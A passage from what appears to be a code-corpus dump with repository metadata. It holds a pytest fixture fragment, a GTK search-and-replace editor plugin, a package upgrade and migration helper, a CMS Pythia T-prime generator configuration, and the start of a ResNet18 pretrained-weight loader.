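        'test1': {'name': {'en': 'test1', 'ja': 'test1j'}},
        'test2': {'name': {'en': 'test2', 'ja': 'test2j'}},
    }

@pytest.fixture()
def subdata():
    return {
        'test1': {'data': 'test1'},
        'test2': {'data': 'test2'},
    }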
b48475f57dc3e7b716dda880d44c0b9842560a1b
d4f3511626be986b557b7ff34f342a771941b9bd
/snaked/plugins/search/__init__.py
c9653724e32079d7eade04d3dc639ba0602d434d
[ "MIT" ]
permissive
bigdrum/snaked
4d78bb313d87973d62e8ee5f2bf23b1fada54e7d
2b8620fec1295fbc735f2c53a554e5f133725cb9
refs/heads/master
2020-12-25T10:15:49.575809
2011-09-09T06:56:06
2011-09-09T06:56:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
12,821
py
author = 'Anton Bobrov<[email protected]>'
name = 'Search'
desc = 'Searches words in document'

import re
import weakref

import gtk
import glib

from snaked.util import idle, refresh_gui

active_widgets = weakref.WeakKeyDictionary()
search_selections = []
mark_task_is_in_queue = [False]


class SearchSelection(object):
    def __init__(self, search):
        self.search = search


def init(manager):
    manager.add_shortcut('search', '<ctrl>f', 'Edit', 'Search or mark', search)
    manager.add_shortcut('find-next', '<ctrl>j', 'Edit', 'Find next', find_next)
    manager.add_shortcut('find-prev', '<ctrl>k', 'Edit', 'Find prev', find_prev)
    manager.add_shortcut('mark-selection', '<ctrl>h', 'Edit',
        'Mark selection occurrences', mark_selection)

    manager.add_global_option('SEARCH_IGNORE_CASE', False, 'Ignore case while searching')
    manager.add_global_option('SEARCH_REGEX', False, 'Use regular expression for searching')


def search(editor):
    if editor in active_widgets:
        widget = active_widgets[editor]
    else:
        widget = create_widget(editor)
        active_widgets[editor] = widget
        editor.widget.pack_start(widget, False)
        editor.push_escape(hide, widget)

    widget.show_all()

    if editor.buffer.get_has_selection():
        start, end = editor.buffer.get_selection_bounds()
        if start.get_line() == end.get_line():
            refresh_gui()

            search = start.get_text(end)
            if widget.regex.get_active():
                search = re.escape(search)

            editor.buffer.place_cursor(start)
            widget.entry.set_text(search)
        else:
            widget.entry.grab_focus()
    else:
        widget.entry.grab_focus()


def backward_search(matcher, text, endpos):
    match = None
    for m in matcher.finditer(text):
        if m.end() > endpos:
            return match
        match = m
    return match


def do_find(editor, dir, start_from=None):
    if editor in active_widgets:
        search = active_widgets[editor].entry.get_text()
        ignore_case = active_widgets[editor].ignore_case.get_active()
        regex = active_widgets[editor].regex.get_active()
    elif search_selections:
        search = search_selections[0].search
        ignore_case = False
        regex = False
    else:
        return

    matcher = get_matcher(editor, search, ignore_case, regex)
    if not matcher:
        return

    iter = start_from
    if not iter:
        if editor.buffer.get_has_selection() and dir == 1:
            iter = editor.buffer.get_iter_at_mark(editor.buffer.get_selection_bound())
        else:
            iter = editor.cursor

    match = None
    if dir == 0:
        match = matcher.search(editor.utext, iter.get_offset())
    else:
        match = backward_search(matcher, editor.utext, iter.get_offset())

    if match:
        bounds = map(editor.buffer.get_iter_at_offset, match.span())
        editor.buffer.select_range(bounds[1], bounds[0])
        editor.view.scroll_mark_onscreen(editor.buffer.get_insert())
        if start_from:
            editor.message('Wrap search', 800)
        return True
    elif not start_from:
        return do_find(editor, dir, editor.buffer.get_bounds()[dir])
    else:
        editor.message('Text not found')
        return False


def find_prev(editor):
    do_find(editor, 1)


def find_next(editor, grab_focus=False):
    if do_find(editor, 0) and grab_focus:
        editor.view.grab_focus()


def create_widget(editor):
    widget = gtk.HBox(False, 10)
    widget.set_border_width(3)

    label = gtk.Label()
    label.set_text('_Search:')
    label.set_use_underline(True)
    widget.pack_start(label, False)

    entry = gtk.Entry()
    widget.pack_start(entry, False)
    widget.entry = entry
    label.set_mnemonic_widget(entry)

    entry.connect('activate', on_search_activate, editor, widget)
    entry.connect_after('changed', on_search_changed, editor, widget)

    label = gtk.Label()
    label.set_text('_Replace:')
    label.set_use_underline(True)
    widget.pack_start(label, False)

    entry = gtk.Entry()
    widget.pack_start(entry, False)
    widget.replace_entry = entry
    label.set_mnemonic_widget(entry)

    entry.connect('activate', on_search_activate, editor, widget)

    cb = gtk.CheckButton('Ignore _case')
    cb.set_active(editor.snaked_conf['SEARCH_IGNORE_CASE'])
    widget.pack_start(cb, False)
    widget.ignore_case = cb

    cb = gtk.CheckButton('Rege_x')
    cb.set_active(editor.snaked_conf['SEARCH_REGEX'])
    widget.pack_start(cb, False)
    widget.regex = cb

    label = gtk.Label('Re_place')
    label.set_use_underline(True)
    label.set_padding(10, 1)
    button = gtk.Button()
    button.add(label)
    widget.pack_start(button, False)
    button.connect('clicked', on_replace_activate, editor, widget)

    label = gtk.Label('Replace _all')
    label.set_use_underline(True)
    label.set_padding(10, 1)
    button = gtk.Button()
    button.add(label)
    widget.pack_start(button, False)
    button.connect('clicked', on_replace_all_activate, editor, widget)
    widget.replace_all = button

    editor.view.connect_after('move-cursor', on_editor_view_move_cursor, widget)
    widget.replace_in_selection = False

    return widget


def get_tag(editor):
    table = editor.buffer.get_tag_table()
    tag = table.lookup('search')
    if not tag:
        tag = editor.buffer.create_tag('search')
        style = editor.buffer.get_style_scheme().get_style('search-match')
        if style:
            if style.props.background_set:
                tag.props.background = style.props.background
            if style.props.foreground_set:
                tag.props.foreground = style.props.foreground
        else:
            style = editor.buffer.get_style_scheme().get_style('text')
            if style.props.background_set:
                tag.props.foreground = style.props.background
            if style.props.foreground_set:
                tag.props.background = style.props.foreground

    return tag


def delete_all_marks(editor):
    start, end = editor.buffer.get_bounds()
    if editor.buffer.get_tag_table().lookup('search'):
        editor.buffer.remove_tag_by_name('search', start, end)


def get_matcher(editor, search, ignore_case, regex, show_feedback=True):
    flags = re.UNICODE
    if ignore_case:
        flags |= re.IGNORECASE

    if regex:
        try:
            return re.compile(unicode(search), flags)
        except Exception, e:
            if show_feedback:
                editor.message('Bad regex: ' + str(e), 3000)
            if editor in active_widgets:
                idle(active_widgets[editor].entry.grab_focus)
            return None
    else:
        return re.compile(re.escape(unicode(search)), flags)


def add_mark_task(editor, search, ignore_case, regex, show_feedback=True):
    if not mark_task_is_in_queue[0]:
        mark_task_is_in_queue[0] = True
        idle(mark_occurences, editor, search, ignore_case, regex,
            show_feedback, priority=glib.PRIORITY_LOW)


def mark_occurences(editor, search, ignore_case, regex, show_feedback=True):
    mark_task_is_in_queue[0] = False

    matcher = get_matcher(editor, search, ignore_case, regex, show_feedback)
    if not matcher:
        return False

    count = 0
    for m in matcher.finditer(editor.utext):
        editor.buffer.apply_tag(get_tag(editor),
            *map(editor.buffer.get_iter_at_offset, m.span()))
        count += 1

    if count == 1:
        if show_feedback:
            idle(editor.message, 'One occurrence is marked')
    elif count > 1:
        if show_feedback:
            idle(editor.message, '%d occurrences are marked' % count)
    else:
        if show_feedback:
            idle(editor.message, 'Text not found')
        return False

    return True


def on_search_activate(sender, editor, widget):
    delete_all_marks(editor)
    editor.add_spot()

    if mark_occurences(editor, widget.entry.get_text(),
            widget.ignore_case.get_active(), widget.regex.get_active()):
        find_next(editor, True)


def on_search_changed(sender, editor, widget):
    search = widget.entry.get_text()
    idle(delete_all_marks, editor)

    if search and (len(search) != 1 or (not search.isdigit()
            and not search.isalpha() and not search.isspace())):
        idle(add_mark_task, editor, search, widget.ignore_case.get_active(),
            widget.regex.get_active(), False)


def hide(editor, widget):
    delete_all_marks(editor)

    try:
        del active_widgets[editor]
    except KeyError:
        pass

    if widget and widget.get_parent():
        editor.widget.remove(widget)
        widget.destroy()
        editor.snaked_conf['SEARCH_IGNORE_CASE'] = widget.ignore_case.get_active()
        editor.snaked_conf['SEARCH_REGEX'] = widget.regex.get_active()

    editor.view.grab_focus()


def mark_selection(editor):
    if not editor.buffer.get_has_selection():
        editor.message('Select something')
        return

    if search_selections:
        search_selections[:] = []

    delete_all_marks(editor)

    occur = SearchSelection(editor.buffer.get_text(*editor.buffer.get_selection_bounds()))
    search_selections.append(occur)

    def remove_all(editor, occur):
        search_selections[:] = []
        delete_all_marks(editor)

    mark_occurences(editor, occur.search, False, False)
    editor.push_escape(remove_all, occur)


def on_replace_activate(button, editor, widget):
    if editor not in active_widgets:
        return

    search = active_widgets[editor].entry.get_text()
    ignore_case = active_widgets[editor].ignore_case.get_active()
    regex = active_widgets[editor].regex.get_active()
    replace = unicode(active_widgets[editor].replace_entry.get_text())

    matcher = get_matcher(editor, search, ignore_case, regex)
    if not matcher:
        return

    if editor.buffer.get_has_selection():
        iter = editor.buffer.get_selection_bounds()[0]
    else:
        iter = editor.cursor

    match = matcher.search(editor.utext, iter.get_offset())
    if not match:
        editor.message('Replace what?')
        return

    start, end = map(editor.buffer.get_iter_at_offset, match.span())

    editor.buffer.begin_user_action()
    editor.buffer.place_cursor(start)
    editor.buffer.delete(start, end)
    editor.buffer.insert_at_cursor(match.expand(replace).encode('utf-8'))
    editor.buffer.end_user_action()

    editor.view.scroll_mark_onscreen(editor.buffer.get_insert())


def on_replace_all_activate(button, editor, widget):
    if editor not in active_widgets:
        return

    search = active_widgets[editor].entry.get_text()
    ignore_case = active_widgets[editor].ignore_case.get_active()
    regex = active_widgets[editor].regex.get_active()
    replace = unicode(active_widgets[editor].replace_entry.get_text())

    matcher = get_matcher(editor, search, ignore_case, regex)
    if not matcher:
        return

    line, offset = editor.cursor.get_line(), editor.cursor.get_line_offset()

    if active_widgets[editor].replace_in_selection:
        start, end = editor.buffer.get_selection_bounds()
        start.order(end)
    else:
        start, end = editor.buffer.get_bounds()

    end_mark = editor.buffer.create_mark(None, end)

    editor.buffer.begin_user_action()
    editor.buffer.place_cursor(start)
    count = 0
    while True:
        match = matcher.search(editor.utext, editor.cursor.get_offset())
        if not match:
            break

        start, end = map(editor.buffer.get_iter_at_offset, match.span())
        if end.compare(editor.buffer.get_iter_at_mark(end_mark)) > 0:
            break

        editor.buffer.place_cursor(start)
        editor.buffer.delete(start, end)
        editor.buffer.insert_at_cursor(match.expand(replace).encode('utf-8'))
        count += 1
    editor.buffer.end_user_action()

    if not count:
        editor.message('Nothing to replace')
    elif count == 1:
        editor.message('One occurrence was replaced')
    else:
        editor.message('%d occurrences were replaced' % count)

    cursor = editor.cursor
    cursor.set_line(line)
    cursor.set_line_offset(offset)
    editor.buffer.place_cursor(cursor)
    editor.view.scroll_mark_onscreen(editor.buffer.get_insert())
    editor.view.grab_focus()


def on_editor_view_move_cursor(view, step, count, selection, widget):
    if selection:
        r = view.get_buffer().get_selection_bounds()
        new_state = r and r[0].get_line() != r[1].get_line()
    else:
        new_state = False

    if widget.replace_in_selection != new_state:
        widget.replace_in_selection = new_state
        if new_state:
            widget.replace_all.set_label("Replace in se_lection")
        else:
            widget.replace_all.set_label("Replace _all")
12c43770a03fa2dd6d1279173deb78335d2ff25a
a6a52013708c5242ea737950a7614e5585c0b1ae
/oot/upgrade/upgrade.py
47b18fbdbc1987f0f4df408fc3bb368c4bf7d6be
[]
no_license
tegin/oot
b381ce32686965cbb7979ee44856b1f9695d23d9
36d372939dc5bbe65eb7106746f747a87ea29a69
refs/heads/prod
2021-07-06T05:09:55.472203
2019-11-15T12:36:21
2019-11-15T12:36:21
216,402,597
5
5
null
2019-11-18T08:28:31
2019-10-20T17:47:45
Python
UTF-8
Python
false
false
1,220
py
import importlib.util
import logging
import os

import pip._internal.main as pip
from packaging import version as packaging_version

_logger = logging.getLogger(__name__)


def upgrade(current_version, version, path, migration_package):
    if current_version >= version:
        return False
    # install/upgrade requirements only when the addon ships a requirements.txt
    if os.path.exists(os.path.join(path, "requirements.txt")):
        pip.main(["install", "-r", os.path.join(path, "requirements.txt"), "--upgrade"])
    migration_path = migration_package.__path__._path[0]
    migrations = []
    for vers in os.listdir(migration_path):
        migration_version = packaging_version.parse(vers)
        if migration_version <= version and migration_version > current_version:
            migrations.append(migration_version)
    migrations = sorted(migrations)
    for migration in migrations:
        spec = importlib.util.spec_from_file_location(
            "migration",
            os.path.join(migration_path, migration.base_version, "migration.py"),
        )
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        _logger.info("Executing migration for %s" % migration.base_version)
        module.migrate()
    return True
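A runnable sketch of how upgrade() can be driven, building a throwaway migration package on disk; all names are invented, and the missing __init__.py is deliberate, since the __path__._path access above relies on a namespace package:

# Illustrative demo only: fabricates a migration package under a temp dir.
import importlib
import os
import sys
import tempfile

from packaging import version as packaging_version

root = tempfile.mkdtemp()
pkg = os.path.join(root, "demo_migrations")
for vers in ("1.1.0", "1.2.0"):
    os.makedirs(os.path.join(pkg, vers))
    with open(os.path.join(pkg, vers, "migration.py"), "w") as fh:
        fh.write("def migrate():\n    print('migrating %s')\n" % vers)

sys.path.insert(0, root)
demo_migrations = importlib.import_module("demo_migrations")

upgrade(
    packaging_version.parse("1.0.0"),  # current_version
    packaging_version.parse("1.2.0"),  # target version
    root,                              # no requirements.txt here, so pip is skipped
    demo_migrations,
)  # prints 'migrating 1.1.0' then 'migrating 1.2.0' and returns True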
3e2d53619ad1a420b81849bc407d615f9aa85874
0fccee4c738449f5e0a8f52ea5acabf51db0e910
/genfragments/EightTeV/TprimeTprime/TprimeTprimeToTZBWinc_M_625_TuneZ2star_8TeV-madgraph_cff.py
0074af204c51e90e60f3bb535520fed0d2b05427
[]
no_license
cms-sw/genproductions
f308ffaf3586c19b29853db40e6d662e937940ff
dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4
refs/heads/master
2023-08-30T17:26:02.581596
2023-08-29T14:53:43
2023-08-29T14:53:43
11,424,867
69
987
null
2023-09-14T12:41:28
2013-07-15T14:18:33
Python
UTF-8
Python
false
false
5,074
py
import FWCore.ParameterSet.Config as cms

#from Configuration.Generator.PythiaUEZ2Settings_cfi import *
from Configuration.Generator.PythiaUEZ2starSettings_cfi import *

generator = cms.EDFilter("Pythia6HadronizerFilter",
    pythiaHepMCVerbosity = cms.untracked.bool(False),
    maxEventsToPrint = cms.untracked.int32(0),
    pythiaPylistVerbosity = cms.untracked.int32(0),
    comEnergy = cms.double(8000.0),
    PythiaParameters = cms.PSet(
        pythiaUESettingsBlock,
        processParameters = cms.vstring(
            'MSTP(1) = 4',
            'MSEL=8       ! fourth generation (t4) fermions',
            'MWID(8)=2',
            'MSTJ(1)=1      ! Fragmentation/hadronization on or off',
            'MSTP(61)=1     ! Parton showering on or off',
            'PMAS(5,1)=4.8   ! b quark mass',  #from Spring11 4000040
            'PMAS(6,1)=172.5 ! t quark mass',  #from Spring11 4000040
            'PMAS(8,1) = 625.0D0 ! tprime quarks mass',
            'PMAS(8,2) = 6.25D0',
            'PMAS(8,3) = 62.5D0',
            'VCKM(1,1) = 0.97414000D0',
            'VCKM(1,2) = 0.22450000D0',
            'VCKM(1,3) = 0.00420000D0',
            'VCKM(1,4) = 0.02500000D0',
            'VCKM(2,1) = 0.22560000D0',
            'VCKM(2,2) = 0.97170000D0',
            'VCKM(2,3) = 0.04109000D0',
            'VCKM(2,4) = 0.05700000D0',
            'VCKM(3,1) = 0.00100000D0',
            'VCKM(3,2) = 0.06200000D0',
            'VCKM(3,3) = 0.91000000D0',
            'VCKM(3,4) = 0.41000000D0',
            'VCKM(4,1) = 0.01300000D0',
            'VCKM(4,2) = 0.04000000D0',
            'VCKM(4,3) = 0.41000000D0',
            'VCKM(4,4) = 0.91000000D0',
            'MDME(66,1)=0     ! g t4',
            'MDME(67,1)=0     ! gamma t4',
            'KFDP(68,2)=6     ! defines Z0 t (no check)',
            'MDME(68,1)=1     ! Z0 t (2 : on for particle, off for anti-particle) ',
            'MDME(69,1)=0     ! W d',
            'MDME(70,1)=0     ! W s',
            'MDME(71,1)=1     ! W b (3 : off for particle, on for particle) ',
            'MDME(72,1)=0     ! W b4',
            'MDME(73,1)=0     ! h0 t4',
            'MDME(74,1)=-1    ! H+ b',
            'MDME(75,1)=-1    ! H+ b4',
            'BRAT(66) = 0.0D0',
            'BRAT(67) = 0.0D0',
            'BRAT(68) = 0.5D0',
            'BRAT(69) = 0.0D0',
            'BRAT(70) = 0.0D0',
            'BRAT(71) = 0.5D0',
            'BRAT(72) = 0.0D0',
            'BRAT(73) = 0.0D0',
            'BRAT(74) = 0.0D0',
            'BRAT(75) = 0.0D0',
            'MDME(174,1)=1     !Z decay into d dbar',
            'MDME(175,1)=1     !Z decay into u ubar',
            'MDME(176,1)=1     !Z decay into s sbar',
            'MDME(177,1)=1     !Z decay into c cbar',
            'MDME(178,1)=1     !Z decay into b bbar',
            'MDME(179,1)=1     !Z decay into t tbar',
            'MDME(180,1)=-1    !Z decay into b4 b4bar',
            'MDME(181,1)=-1    !Z decay into t4 t4bar',
            'MDME(182,1)=1     !Z decay into e- e+',
            'MDME(183,1)=1     !Z decay into nu_e nu_ebar',
            'MDME(184,1)=1     !Z decay into mu- mu+',
            'MDME(185,1)=1     !Z decay into nu_mu nu_mubar',
            'MDME(186,1)=1     !Z decay into tau- tau+',
            'MDME(187,1)=1     !Z decay into nu_tau nu_taubar',
            'MDME(188,1)=-1    !Z decay into tau4 tau4bar',
            'MDME(189,1)=-1    !Z decay into nu_tau4 nu_tau4bar',
            'MDME(190,1)=1     !W decay into u dbar',
            'MDME(191,1)=1     !W decay into c dbar',
            'MDME(192,1)=1     !W decay into t dbar',
            'MDME(193,1)=-1    !W decay into t4 dbar',
            'MDME(194,1)=1     !W decay into u sbar',
            'MDME(195,1)=1     !W decay into c sbar',
            'MDME(196,1)=1     !W decay into t sbar',
            'MDME(197,1)=-1    !W decay into t4 sbar',
            'MDME(198,1)=1     !W decay into u bbar',
            'MDME(199,1)=1     !W decay into c bbar',
            'MDME(200,1)=1     !W decay into t bbar',
            'MDME(201,1)=-1    !W decay into t4 bbar',
            'MDME(202,1)=-1    !W decay into u b4bar',
            'MDME(203,1)=-1    !W decay into c b4bar',
            'MDME(204,1)=-1    !W decay into t b4bar',
            'MDME(205,1)=-1    !W decay into t4 b4bar',
            'MDME(206,1)=1     !W decay into e- nu_e',
            'MDME(207,1)=1     !W decay into mu nu_mu',
            'MDME(208,1)=1     !W decay into tau nu_tau',
            'MDME(209,1)=-1    !W decay into tau4 nu_tau4'),
        # This is a vector of ParameterSet names to be read, in this order
        parameterSets = cms.vstring('pythiaUESettings',
                                    'processParameters')
    ),
    jetMatching = cms.untracked.PSet(
        scheme = cms.string("Madgraph"),
        mode = cms.string("auto"),  # soup, or "inclusive" / "exclusive"
        MEMAIN_etaclmax = cms.double(5.0),
        MEMAIN_qcut = cms.double(-1),
        MEMAIN_nqmatch = cms.int32(-1),
        MEMAIN_minjets = cms.int32(-1),
        MEMAIN_maxjets = cms.int32(-1),
        MEMAIN_showerkt = cms.double(0),
        MEMAIN_excres = cms.string(''),
        outTree_flag = cms.int32(0)
    )
)

ProductionFilterSequence = cms.Sequence(generator)
1ef6abb1dc8514a3821f1e914f36edb9afe6191c
14aa5e3974f9857b58a4a06ebf42dc348e2ab6ae
/severstal-steel-defect-detection/20190910/code/dummy_11a/resnet18_unet_softmax_01/resnet.py
66efd98d79b56664cb2de700a77c9f360ef051b9
[]
no_license
alimbekovKZ/jupyter_notebooks_2
b729e6a16210d0117ff9fb563c83d39f59a906e4
a925fb3adcf675e8a9a9eb4bae472a38df15fd28
refs/heads/master
2023-02-10T08:56:15.435965
2021-01-05T10:10:20
2021-01-05T10:10:20
266,936,671
1
0
null
null
null
null
UTF-8
Python
false
false
16,282
py
from common import *

from lib.net.sync_bn.nn import BatchNorm2dSync as SynchronizedBatchNorm2d
BatchNorm2d = SynchronizedBatchNorm2d
#BatchNorm2d = nn.BatchNorm2d

IMAGE_RGB_MEAN = [0.485, 0.456, 0.406]
IMAGE_RGB_STD = [0.229, 0.224, 0.225]

###############################################################################
CONVERSION = [
    'block0.0.weight', (64, 3, 7, 7), 'conv1.weight', (64, 3, 7, 7),
    'block0.1.weight', (64,), 'bn1.weight', (64,),
    'block0.1.bias', (64,), 'bn1.bias', (64,),
    'block0.1.running_mean', (64,), 'bn1.running_mean', (64,),
    'block0.1.running_var', (64,), 'bn1.running_var', (64,),
    'block1.1.conv_bn1.conv.weight', (64, 64, 3, 3), 'layer1.0.conv1.weight', (64, 64, 3, 3),
    'block1.1.conv_bn1.bn.weight', (64,), 'layer1.0.bn1.weight', (64,),
    'block1.1.conv_bn1.bn.bias', (64,), 'layer1.0.bn1.bias', (64,),
    'block1.1.conv_bn1.bn.running_mean', (64,), 'layer1.0.bn1.running_mean', (64,),
    'block1.1.conv_bn1.bn.running_var', (64,), 'layer1.0.bn1.running_var', (64,),
    'block1.1.conv_bn2.conv.weight', (64, 64, 3, 3), 'layer1.0.conv2.weight', (64, 64, 3, 3),
    'block1.1.conv_bn2.bn.weight', (64,), 'layer1.0.bn2.weight', (64,),
    'block1.1.conv_bn2.bn.bias', (64,), 'layer1.0.bn2.bias', (64,),
    'block1.1.conv_bn2.bn.running_mean', (64,), 'layer1.0.bn2.running_mean', (64,),
    'block1.1.conv_bn2.bn.running_var', (64,), 'layer1.0.bn2.running_var', (64,),
    'block1.2.conv_bn1.conv.weight', (64, 64, 3, 3), 'layer1.1.conv1.weight', (64, 64, 3, 3),
    'block1.2.conv_bn1.bn.weight', (64,), 'layer1.1.bn1.weight', (64,),
    'block1.2.conv_bn1.bn.bias', (64,), 'layer1.1.bn1.bias', (64,),
    'block1.2.conv_bn1.bn.running_mean', (64,), 'layer1.1.bn1.running_mean', (64,),
    'block1.2.conv_bn1.bn.running_var', (64,), 'layer1.1.bn1.running_var', (64,),
    'block1.2.conv_bn2.conv.weight', (64, 64, 3, 3), 'layer1.1.conv2.weight', (64, 64, 3, 3),
    'block1.2.conv_bn2.bn.weight', (64,), 'layer1.1.bn2.weight', (64,),
    'block1.2.conv_bn2.bn.bias', (64,), 'layer1.1.bn2.bias', (64,),
    'block1.2.conv_bn2.bn.running_mean', (64,), 'layer1.1.bn2.running_mean', (64,),
    'block1.2.conv_bn2.bn.running_var', (64,), 'layer1.1.bn2.running_var', (64,),
    'block2.0.conv_bn1.conv.weight', (128, 64, 3, 3), 'layer2.0.conv1.weight', (128, 64, 3, 3),
    'block2.0.conv_bn1.bn.weight', (128,), 'layer2.0.bn1.weight', (128,),
    'block2.0.conv_bn1.bn.bias', (128,), 'layer2.0.bn1.bias', (128,),
    'block2.0.conv_bn1.bn.running_mean', (128,), 'layer2.0.bn1.running_mean', (128,),
    'block2.0.conv_bn1.bn.running_var', (128,), 'layer2.0.bn1.running_var', (128,),
    'block2.0.conv_bn2.conv.weight', (128, 128, 3, 3), 'layer2.0.conv2.weight', (128, 128, 3, 3),
    'block2.0.conv_bn2.bn.weight', (128,), 'layer2.0.bn2.weight', (128,),
    'block2.0.conv_bn2.bn.bias', (128,), 'layer2.0.bn2.bias', (128,),
    'block2.0.conv_bn2.bn.running_mean', (128,), 'layer2.0.bn2.running_mean', (128,),
    'block2.0.conv_bn2.bn.running_var', (128,), 'layer2.0.bn2.running_var', (128,),
    'block2.0.shortcut.conv.weight', (128, 64, 1, 1), 'layer2.0.downsample.0.weight', (128, 64, 1, 1),
    'block2.0.shortcut.bn.weight', (128,), 'layer2.0.downsample.1.weight', (128,),
    'block2.0.shortcut.bn.bias', (128,), 'layer2.0.downsample.1.bias', (128,),
    'block2.0.shortcut.bn.running_mean', (128,), 'layer2.0.downsample.1.running_mean', (128,),
    'block2.0.shortcut.bn.running_var', (128,), 'layer2.0.downsample.1.running_var', (128,),
    'block2.1.conv_bn1.conv.weight', (128, 128, 3, 3), 'layer2.1.conv1.weight', (128, 128, 3, 3),
    'block2.1.conv_bn1.bn.weight', (128,), 'layer2.1.bn1.weight', (128,),
    'block2.1.conv_bn1.bn.bias', (128,), 'layer2.1.bn1.bias', (128,),
    'block2.1.conv_bn1.bn.running_mean', (128,), 'layer2.1.bn1.running_mean', (128,),
    'block2.1.conv_bn1.bn.running_var', (128,), 'layer2.1.bn1.running_var', (128,),
    'block2.1.conv_bn2.conv.weight', (128, 128, 3, 3), 'layer2.1.conv2.weight', (128, 128, 3, 3),
    'block2.1.conv_bn2.bn.weight', (128,), 'layer2.1.bn2.weight', (128,),
    'block2.1.conv_bn2.bn.bias', (128,), 'layer2.1.bn2.bias', (128,),
    'block2.1.conv_bn2.bn.running_mean', (128,), 'layer2.1.bn2.running_mean', (128,),
    'block2.1.conv_bn2.bn.running_var', (128,), 'layer2.1.bn2.running_var', (128,),
    'block3.0.conv_bn1.conv.weight', (256, 128, 3, 3), 'layer3.0.conv1.weight', (256, 128, 3, 3),
    'block3.0.conv_bn1.bn.weight', (256,), 'layer3.0.bn1.weight', (256,),
    'block3.0.conv_bn1.bn.bias', (256,), 'layer3.0.bn1.bias', (256,),
    'block3.0.conv_bn1.bn.running_mean', (256,), 'layer3.0.bn1.running_mean', (256,),
    'block3.0.conv_bn1.bn.running_var', (256,), 'layer3.0.bn1.running_var', (256,),
    'block3.0.conv_bn2.conv.weight', (256, 256, 3, 3), 'layer3.0.conv2.weight', (256, 256, 3, 3),
    'block3.0.conv_bn2.bn.weight', (256,), 'layer3.0.bn2.weight', (256,),
    'block3.0.conv_bn2.bn.bias', (256,), 'layer3.0.bn2.bias', (256,),
    'block3.0.conv_bn2.bn.running_mean', (256,), 'layer3.0.bn2.running_mean', (256,),
    'block3.0.conv_bn2.bn.running_var', (256,), 'layer3.0.bn2.running_var', (256,),
    'block3.0.shortcut.conv.weight', (256, 128, 1, 1), 'layer3.0.downsample.0.weight', (256, 128, 1, 1),
    'block3.0.shortcut.bn.weight', (256,), 'layer3.0.downsample.1.weight', (256,),
    'block3.0.shortcut.bn.bias', (256,), 'layer3.0.downsample.1.bias', (256,),
    'block3.0.shortcut.bn.running_mean', (256,), 'layer3.0.downsample.1.running_mean', (256,),
    'block3.0.shortcut.bn.running_var', (256,), 'layer3.0.downsample.1.running_var', (256,),
    'block3.1.conv_bn1.conv.weight', (256, 256, 3, 3), 'layer3.1.conv1.weight', (256, 256, 3, 3),
    'block3.1.conv_bn1.bn.weight', (256,), 'layer3.1.bn1.weight', (256,),
    'block3.1.conv_bn1.bn.bias', (256,), 'layer3.1.bn1.bias', (256,),
    'block3.1.conv_bn1.bn.running_mean', (256,), 'layer3.1.bn1.running_mean', (256,),
    'block3.1.conv_bn1.bn.running_var', (256,), 'layer3.1.bn1.running_var', (256,),
    'block3.1.conv_bn2.conv.weight', (256, 256, 3, 3), 'layer3.1.conv2.weight', (256, 256, 3, 3),
    'block3.1.conv_bn2.bn.weight', (256,), 'layer3.1.bn2.weight', (256,),
    'block3.1.conv_bn2.bn.bias', (256,), 'layer3.1.bn2.bias', (256,),
    'block3.1.conv_bn2.bn.running_mean', (256,), 'layer3.1.bn2.running_mean', (256,),
    'block3.1.conv_bn2.bn.running_var', (256,), 'layer3.1.bn2.running_var', (256,),
    'block4.0.conv_bn1.conv.weight', (512, 256, 3, 3), 'layer4.0.conv1.weight', (512, 256, 3, 3),
    'block4.0.conv_bn1.bn.weight', (512,), 'layer4.0.bn1.weight', (512,),
    'block4.0.conv_bn1.bn.bias', (512,), 'layer4.0.bn1.bias', (512,),
    'block4.0.conv_bn1.bn.running_mean', (512,), 'layer4.0.bn1.running_mean', (512,),
    'block4.0.conv_bn1.bn.running_var', (512,), 'layer4.0.bn1.running_var', (512,),
    'block4.0.conv_bn2.conv.weight', (512, 512, 3, 3), 'layer4.0.conv2.weight', (512, 512, 3, 3),
    'block4.0.conv_bn2.bn.weight', (512,), 'layer4.0.bn2.weight', (512,),
    'block4.0.conv_bn2.bn.bias', (512,), 'layer4.0.bn2.bias', (512,),
    'block4.0.conv_bn2.bn.running_mean', (512,), 'layer4.0.bn2.running_mean', (512,),
    'block4.0.conv_bn2.bn.running_var', (512,), 'layer4.0.bn2.running_var', (512,),
    'block4.0.shortcut.conv.weight', (512, 256, 1, 1), 'layer4.0.downsample.0.weight', (512, 256, 1, 1),
    'block4.0.shortcut.bn.weight', (512,), 'layer4.0.downsample.1.weight', (512,),
    'block4.0.shortcut.bn.bias', (512,), 'layer4.0.downsample.1.bias', (512,),
    'block4.0.shortcut.bn.running_mean', (512,), 'layer4.0.downsample.1.running_mean', (512,),
    'block4.0.shortcut.bn.running_var', (512,), 'layer4.0.downsample.1.running_var', (512,),
    'block4.1.conv_bn1.conv.weight', (512, 512, 3, 3), 'layer4.1.conv1.weight', (512, 512, 3, 3),
    'block4.1.conv_bn1.bn.weight', (512,), 'layer4.1.bn1.weight', (512,),
    'block4.1.conv_bn1.bn.bias', (512,), 'layer4.1.bn1.bias', (512,),
    'block4.1.conv_bn1.bn.running_mean', (512,), 'layer4.1.bn1.running_mean', (512,),
    'block4.1.conv_bn1.bn.running_var', (512,), 'layer4.1.bn1.running_var', (512,),
    'block4.1.conv_bn2.conv.weight', (512, 512, 3, 3), 'layer4.1.conv2.weight', (512, 512, 3, 3),
    'block4.1.conv_bn2.bn.weight', (512,), 'layer4.1.bn2.weight', (512,),
    'block4.1.conv_bn2.bn.bias', (512,), 'layer4.1.bn2.bias', (512,),
    'block4.1.conv_bn2.bn.running_mean', (512,), 'layer4.1.bn2.running_mean', (512,),
    'block4.1.conv_bn2.bn.running_var', (512,), 'layer4.1.bn2.running_var', (512,),
    'logit.weight', (1000, 512), 'fc.weight', (1000, 512),
    'logit.bias', (1000,), 'fc.bias', (1000,),
]

PRETRAIN_FILE = \
    '/root/share/project/kaggle/2019/steel/data/pretrain_model/resnet18-5c106cde.pth'


def load_pretrain(net, skip=[], pretrain_file=PRETRAIN_FILE, conversion=CONVERSION, is_print=True):
    #raise NotImplementedError
    print('\tload pretrain_file: %s' % pretrain_file)

    #pretrain_state_dict = torch.load(pretrain_file)
    pretrain_state_dict = torch.load(pretrain_file, map_location=lambda storage, loc: storage)
    state_dict = net.state_dict()

    i = 0
    conversion = np.array(conversion).reshape(-1, 4)
    for key, _, pretrain_key, _ in conversion:
